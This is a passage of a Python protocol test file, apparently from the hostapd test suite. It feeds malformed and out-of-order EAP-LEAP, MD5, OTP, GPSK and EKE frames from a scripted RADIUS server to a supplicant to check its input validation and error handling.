            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_LEAP)
        if ctx['num'] == 2:
            logger.info("Test: Unexpected version")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_LEAP,
                               0, 0, 0)
        if ctx['num'] == 3:
            logger.info("Test: Invalid challenge length")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_LEAP,
                               1, 0, 0)
        if ctx['num'] == 4:
            logger.info("Test: Truncated challenge")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_LEAP,
                               1, 0, 8)
        if ctx['num'] == 5:
            return leap_challenge(ctx)
        if ctx['num'] == 6:
            logger.info("Test: Missing payload in Response")
            return struct.pack(">BBHB", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1,
                               EAP_TYPE_LEAP)
        if ctx['num'] == 7:
            return leap_challenge(ctx)
        if ctx['num'] == 8:
            logger.info("Test: Unexpected version in Response")
            return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_LEAP,
                               0, 0, 8)
        if ctx['num'] == 9:
            return leap_challenge(ctx)
        if ctx['num'] == 10:
            logger.info("Test: Invalid challenge length in Response")
            return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_LEAP,
                               1, 0, 0)
        if ctx['num'] == 11:
            return leap_challenge(ctx)
        if ctx['num'] == 12:
            logger.info("Test: Truncated challenge in Response")
            return struct.pack(">BBHBBBB", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_LEAP,
                               1, 0, 24)
        if ctx['num'] == 13:
            return leap_challenge(ctx)
        if ctx['num'] == 14:
            # Fixed typo in log message ("challange" -> "challenge").
            logger.info("Test: Invalid challenge value in Response")
            return struct.pack(">BBHBBBB6L", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_LEAP,
                               1, 0, 24,
                               0, 0, 0, 0, 0, 0)
        if ctx['num'] == 15:
            return leap_challenge(ctx)
        if ctx['num'] == 16:
            # Fixed typo in log message ("challange" -> "challenge").
            logger.info("Test: Valid challenge value in Response")
            return struct.pack(">BBHBBBB24B", EAP_CODE_RESPONSE, ctx['id'],
                               4 + 1 + 3 + 24,
                               EAP_TYPE_LEAP,
                               1, 0, 24,
                               0x48, 0x4e, 0x46, 0xe3, 0x88, 0x49, 0x46, 0xbd,
                               0x28, 0x48, 0xf8, 0x53, 0x82, 0x50, 0x00, 0x04,
                               0x93, 0x50, 0x30, 0xd7, 0x25, 0xea, 0x5f, 0x66)
        if ctx['num'] == 17:
            return leap_challenge(ctx)
        if ctx['num'] == 18:
            logger.info("Test: Success")
            return struct.pack(">BBHB", EAP_CODE_SUCCESS, ctx['id'],
                               4 + 1,
                               EAP_TYPE_LEAP)
        # hostapd will drop the next frame in the sequence
        if ctx['num'] == 19:
            return leap_challenge(ctx)
        if ctx['num'] == 20:
            logger.info("Test: Failure")
            return struct.pack(">BBHB", EAP_CODE_FAILURE, ctx['id'],
                               4 + 1,
                               EAP_TYPE_LEAP)
        return None

    srv = start_radius_server(leap_handler)

    try:
        hapd = start_ap(apdev[0]['ifname'])

        for i in range(0, 12):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="LEAP", identity="user", password="password",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.1)
            if i == 10:
                logger.info("Wait for additional roundtrip")
                time.sleep(1)
            dev[0].request("REMOVE_NETWORK all")
    finally:
        stop_radius_server(srv)
def test_eap_proto_md5(dev, apdev):
    """EAP-MD5 protocol tests"""
    check_eap_capa(dev[0], "MD5")
    def md5_handler(ctx, req):
        logger.info("md5_handler - RX " + req.encode("hex"))
        # Per-session message counter and rolling EAP identifier.
        ctx['num'] = ctx.get('num', 0) + 1
        ctx['id'] = (ctx.get('id', 1) + 1) % 256
        num = ctx['num']

        if num == 1:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_MD5)
        if num == 2:
            logger.info("Test: Zero-length challenge")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_MD5,
                               0)
        if num == 3:
            logger.info("Test: Truncated challenge")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_MD5,
                               1)
        if num == 4:
            logger.info("Test: Shortest possible challenge and name")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_MD5,
                               1, 0xaa, ord('n'))
        return None

    srv = start_radius_server(md5_handler)

    try:
        hapd = start_ap(apdev[0]['ifname'])

        # One association attempt per scripted server response.
        for _ in range(4):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="MD5", identity="user", password="password",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.1)
            dev[0].request("REMOVE_NETWORK all")
    finally:
        stop_radius_server(srv)
def test_eap_proto_md5_errors(dev, apdev):
    """EAP-MD5 local error cases"""
    check_eap_capa(dev[0], "MD5")
    params = hostapd.wpa2_eap_params(ssid="eap-test")
    hapd = hostapd.add_ap(apdev[0]['ifname'], params)

    def start_conn():
        # Begin an EAP-MD5 association attempt and wait for the method to
        # be selected.
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="MD5", identity="phase1-user", password="password",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")

    # CHAP MD5 computation failure.
    with fail_test(dev[0], 1, "chap_md5"):
        start_conn()
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()

    # Allocation failure while building the MD5 response.
    with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_md5_process"):
        start_conn()
        time.sleep(0.1)
        dev[0].request("REMOVE_NETWORK all")
def test_eap_proto_otp(dev, apdev):
    """EAP-OTP protocol tests

    Exercises EAP-OTP against a scripted RADIUS server, covering an empty
    request payload, a normal challenge/response round, and the CTRL-REQ-OTP
    control-interface password request path.

    Fix: dev[0].wait_event() was called with a bare string for the final
    EAP-SUCCESS wait; wait_event() iterates its argument, so a string is
    iterated character-by-character and would match almost any event. It is
    now passed as a one-element list like every other call site.
    """
    def otp_handler(ctx, req):
        logger.info("otp_handler - RX " + req.encode("hex"))
        # Message counter and EAP identifier bookkeeping for the scripted
        # sequence.
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] += 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        if ctx['num'] == 1:
            logger.info("Test: Empty payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_OTP)
        if ctx['num'] == 2:
            logger.info("Test: Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'],
                               4)
        if ctx['num'] == 3:
            logger.info("Test: Challenge included")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_OTP,
                               ord('A'))
        if ctx['num'] == 4:
            logger.info("Test: Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'],
                               4)
        return None

    srv = start_radius_server(otp_handler)

    try:
        hapd = start_ap(apdev[0]['ifname'])

        for i in range(0, 1):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="OTP", identity="user", password="password",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.1)
            dev[0].request("REMOVE_NETWORK all")

        # No password configured: the supplicant must ask for it over the
        # control interface and proceed once it is supplied.
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="OTP", identity="user", wait_connect=False)
        ev = dev[0].wait_event(["CTRL-REQ-OTP"])
        if ev is None:
            raise Exception("Request for password timed out")
        id = ev.split(':')[0].split('-')[-1]
        dev[0].request("CTRL-RSP-OTP-" + id + ":password")
        # Fix: wait_event() expects a list of event prefixes.
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"])
        if ev is None:
            raise Exception("Success not reported")
    finally:
        stop_radius_server(srv)
# EAP-GPSK op-code values used when constructing the scripted test frames
# below.
EAP_GPSK_OPCODE_GPSK_1 = 1
EAP_GPSK_OPCODE_GPSK_2 = 2
EAP_GPSK_OPCODE_GPSK_3 = 3
EAP_GPSK_OPCODE_GPSK_4 = 4
EAP_GPSK_OPCODE_FAIL = 5
EAP_GPSK_OPCODE_PROTECTED_FAIL = 6
def test_eap_proto_gpsk(dev, apdev):
    """EAP-GPSK protocol tests

    A scripted RADIUS server feeds wpa_supplicant a sequence of malformed
    and out-of-order EAP-GPSK messages to exercise the peer's validation of
    GPSK-1 and GPSK-3 payloads.

    The well-formed "GPSK-1 Supported CSuite" frame was duplicated 13 times
    in the original handler; it is now built by the gpsk_1() helper (same
    DRY pattern as sake_challenge() earlier in this file). All frames are
    byte-identical to the original sequence.
    """
    def gpsk_1(ctx, msg="GPSK-1 Supported CSuite"):
        # Standard well-formed GPSK-1: zero-length ID_Server, all-zero
        # RAND_Server, and a CSuite_List with a single entry (vendor 0,
        # specifier 1).
        logger.info("Test: " + msg)
        return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                           4 + 1 + 1 + 2 + 32 + 2 + 6,
                           EAP_TYPE_GPSK,
                           EAP_GPSK_OPCODE_GPSK_1, 0,
                           0, 0, 0, 0, 0, 0, 0, 0,
                           6, 0, 1)

    def gpsk_handler(ctx, req):
        logger.info("gpsk_handler - RX " + req.encode("hex"))
        # Message counter and EAP identifier bookkeeping for the scripted
        # sequence.
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256

        idx = 0

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_GPSK)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unknown opcode")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_GPSK,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected GPSK-3")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_3)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Too short GPSK-1")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Truncated ID_Server")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Missing RAND_Server")
            return struct.pack(">BBHBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Missing CSuite_List")
            return struct.pack(">BBHBBH8L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Truncated CSuite_List")
            return struct.pack(">BBHBBH8LH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Empty CSuite_List")
            return struct.pack(">BBHBBH8LH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 Invalid CSuite_List")
            return struct.pack(">BBHBBH8LHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 1,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               1, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-1 No supported CSuite")
            return struct.pack(">BBHBBH8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 0,
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            return gpsk_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            return gpsk_1(ctx, "Unexpected GPSK-1")
        idx += 1
        if ctx['num'] == idx:
            return gpsk_1(ctx, "GPSK-1 Supported CSuite but too short key")
        idx += 1
        if ctx['num'] == idx:
            return gpsk_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short GPSK-3")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_3)
        idx += 1
        if ctx['num'] == idx:
            return gpsk_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Mismatch in RAND_Peer")
            return struct.pack(">BBHBB8L", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 32,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_3,
                               0, 0, 0, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            return gpsk_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Missing RAND_Server")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            # Copy 32 octets from the received message (presumably
            # RAND_Peer from the peer's GPSK-2 -- verify against peer code).
            msg += req[14:46]
            return msg
        idx += 1
        if ctx['num'] == idx:
            return gpsk_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Mismatch in RAND_Server")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8L", 1, 1, 1, 1, 1, 1, 1, 1)
            return msg
        idx += 1
        if ctx['num'] == idx:
            return gpsk_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Missing ID_Server")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8L", 0, 0, 0, 0, 0, 0, 0, 0)
            return msg
        idx += 1
        if ctx['num'] == idx:
            return gpsk_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Truncated ID_Server")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LH", 0, 0, 0, 0, 0, 0, 0, 0, 1)
            return msg
        idx += 1
        if ctx['num'] == idx:
            return gpsk_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Mismatch in ID_Server")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 3,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LHB", 0, 0, 0, 0, 0, 0, 0, 0, 1, ord('B'))
            return msg
        idx += 1
        if ctx['num'] == idx:
            # GPSK-1 variant with a one-octet ID_Server ('A') instead of the
            # zero-length ID_Server used by gpsk_1().
            logger.info("Test: GPSK-1 Supported CSuite")
            return struct.pack(">BBHBBHB8LHLH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 3 + 32 + 2 + 6,
                               EAP_TYPE_GPSK,
                               EAP_GPSK_OPCODE_GPSK_1, 1, ord('A'),
                               0, 0, 0, 0, 0, 0, 0, 0,
                               6, 0, 1)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Mismatch in ID_Server (same length)")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 3,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            # Offset shifted by one octet relative to the other GPSK-3
            # cases, matching the one-octet ID_Server in the preceding
            # GPSK-1 -- presumably to copy the same 32-octet field.
            msg += req[15:47]
            msg += struct.pack(">8LHB", 0, 0, 0, 0, 0, 0, 0, 0, 1, ord('B'))
            return msg
        idx += 1
        if ctx['num'] == idx:
            return gpsk_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Missing CSuite_Sel")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LH", 0, 0, 0, 0, 0, 0, 0, 0, 0)
            return msg
        idx += 1
        if ctx['num'] == idx:
            return gpsk_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Mismatch in CSuite_Sel")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2 + 6,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LHLH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 2)
            return msg
        idx += 1
        if ctx['num'] == idx:
            return gpsk_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Missing len(PD_Payload_Block)")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2 + 6,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LHLH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1)
            return msg
        idx += 1
        if ctx['num'] == idx:
            return gpsk_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Truncated PD_Payload_Block")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2 + 6 + 2,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LHLHH", 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1)
            return msg
        idx += 1
        if ctx['num'] == idx:
            return gpsk_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Missing MAC")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2 + 6 + 3,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LHLHHB",
                               0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 123)
            return msg
        idx += 1
        if ctx['num'] == idx:
            return gpsk_1(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: GPSK-3 Incorrect MAC")
            msg = struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                              4 + 1 + 1 + 32 + 32 + 2 + 6 + 3 + 16,
                              EAP_TYPE_GPSK,
                              EAP_GPSK_OPCODE_GPSK_3)
            msg += req[14:46]
            msg += struct.pack(">8LHLHHB4L",
                               0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 123,
                               0, 0, 0, 0)
            return msg
        return None

    srv = start_radius_server(gpsk_handler)

    try:
        hapd = start_ap(apdev[0]['ifname'])

        for i in range(0, 27):
            if i == 12:
                # Attempt corresponding to the "Supported CSuite but too
                # short key" step above.
                pw = "short"
            else:
                pw = "abcdefghijklmnop0123456789abcdef"
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="GPSK", identity="user", password=pw,
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.05)
            dev[0].request("REMOVE_NETWORK all")
    finally:
        stop_radius_server(srv)
# EAP-EKE exchange identifiers used when constructing the scripted test
# frames below.
EAP_EKE_ID = 1
EAP_EKE_COMMIT = 2
EAP_EKE_CONFIRM = 3
EAP_EKE_FAILURE = 4
def test_eap_proto_eke(dev, apdev):
    """EAP-EKE protocol tests

    A scripted RADIUS server feeds wpa_supplicant malformed and unexpected
    EAP-EKE messages (ID, Commit, Confirm, Failure exchanges) to exercise
    the peer's validation paths.

    The original handler duplicated the EAP-Failure frame 11 times, the
    valid EAP-EKE-ID/Request 6 times, and the all-zero Commit twice; those
    are now built by helpers (same DRY pattern as sake_challenge() earlier
    in this file). All frames are byte-identical to the original sequence.
    """
    def eke_failure(ctx):
        # Plain EAP-Failure to terminate the current scripted exchange.
        logger.info("Test: EAP-Failure")
        return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)

    def eke_id_req(ctx, proposal, msg="Valid EAP-EKE-ID/Request"):
        # EAP-EKE-ID/Request with NumProposals=1, the given 4-octet
        # proposal, and IDType 255.
        logger.info("Test: " + msg)
        return struct.pack(">BBHBBBB4BB",
                           EAP_CODE_REQUEST, ctx['id'],
                           4 + 1 + 1 + 2 + 4 + 1,
                           EAP_TYPE_EKE,
                           EAP_EKE_ID,
                           1, 0,
                           proposal[0], proposal[1], proposal[2], proposal[3],
                           255)

    def eke_commit_zero(ctx):
        # EAP-EKE-Commit/Request with all-zero DHComponent_S and an empty
        # CBvalue.
        logger.info("Test: All zeroes DHComponent_S and empty CBvalue in EAP-EKE-Commit/Request")
        return struct.pack(">BBHBB4L32L",
                           EAP_CODE_REQUEST, ctx['id'],
                           4 + 1 + 1 + 16 + 128,
                           EAP_TYPE_EKE,
                           EAP_EKE_COMMIT,
                           *([0] * 36))

    def eke_handler(ctx, req):
        logger.info("eke_handler - RX " + req.encode("hex"))
        # Message counter and EAP identifier bookkeeping for the scripted
        # sequence.
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256

        idx = 0

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1,
                               EAP_TYPE_EKE)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unknown exchange")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               255)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: No NumProposals in EAP-EKE-ID/Request")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID)
        idx += 1
        if ctx['num'] == idx:
            return eke_failure(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: NumProposals=0 in EAP-EKE-ID/Request")
            return struct.pack(">BBHBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               0)
        idx += 1
        if ctx['num'] == idx:
            return eke_failure(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Truncated Proposals list in EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 4,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               2, 0, 0, 0, 0, 0)
        idx += 1
        if ctx['num'] == idx:
            return eke_failure(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unsupported proposals in EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4B4B4B4B", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 4 * 4,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               4, 0,
                               0, 0, 0, 0,
                               3, 0, 0, 0,
                               3, 1, 0, 0,
                               3, 1, 1, 0)
        idx += 1
        if ctx['num'] == idx:
            return eke_failure(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing IDType/Identity in EAP-EKE-ID/Request")
            return struct.pack(">BBHBBBB4B4B4B4B4B",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1 + 2 + 5 * 4,
                               EAP_TYPE_EKE,
                               EAP_EKE_ID,
                               5, 0,
                               0, 0, 0, 0,
                               3, 0, 0, 0,
                               3, 1, 0, 0,
                               3, 1, 1, 0,
                               3, 1, 1, 1)
        idx += 1
        if ctx['num'] == idx:
            return eke_failure(ctx)
        idx += 1
        if ctx['num'] == idx:
            return eke_id_req(ctx, (3, 1, 1, 1))
        idx += 1
        if ctx['num'] == idx:
            return eke_id_req(ctx, (3, 1, 1, 1),
                              "Unexpected EAP-EKE-ID/Request")
        idx += 1
        if ctx['num'] == idx:
            return eke_failure(ctx)
        idx += 1
        if ctx['num'] == idx:
            return eke_id_req(ctx, (3, 1, 1, 1))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected EAP-EKE-Confirm/Request")
            return struct.pack(">BBHBB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_CONFIRM)
        idx += 1
        if ctx['num'] == idx:
            return eke_failure(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short EAP-EKE-Failure/Request")
            return struct.pack(">BBHBB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_FAILURE)
        idx += 1
        if ctx['num'] == idx:
            return eke_failure(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected EAP-EKE-Commit/Request")
            return struct.pack(">BBHBB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_COMMIT)
        idx += 1
        if ctx['num'] == idx:
            return eke_failure(ctx)
        idx += 1
        if ctx['num'] == idx:
            return eke_id_req(ctx, (3, 1, 1, 1))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short EAP-EKE-Commit/Request")
            return struct.pack(">BBHBB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_COMMIT)
        idx += 1
        if ctx['num'] == idx:
            return eke_failure(ctx)
        idx += 1
        if ctx['num'] == idx:
            return eke_id_req(ctx, (1, 1, 1, 1))
        idx += 1
        if ctx['num'] == idx:
            return eke_commit_zero(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Too short EAP-EKE-Confirm/Request")
            return struct.pack(">BBHBB",
                               EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_EKE,
                               EAP_EKE_CONFIRM)
        idx += 1
        if ctx['num'] == idx:
            return eke_failure(ctx)
        idx += 1
        if ctx['num'] == idx:
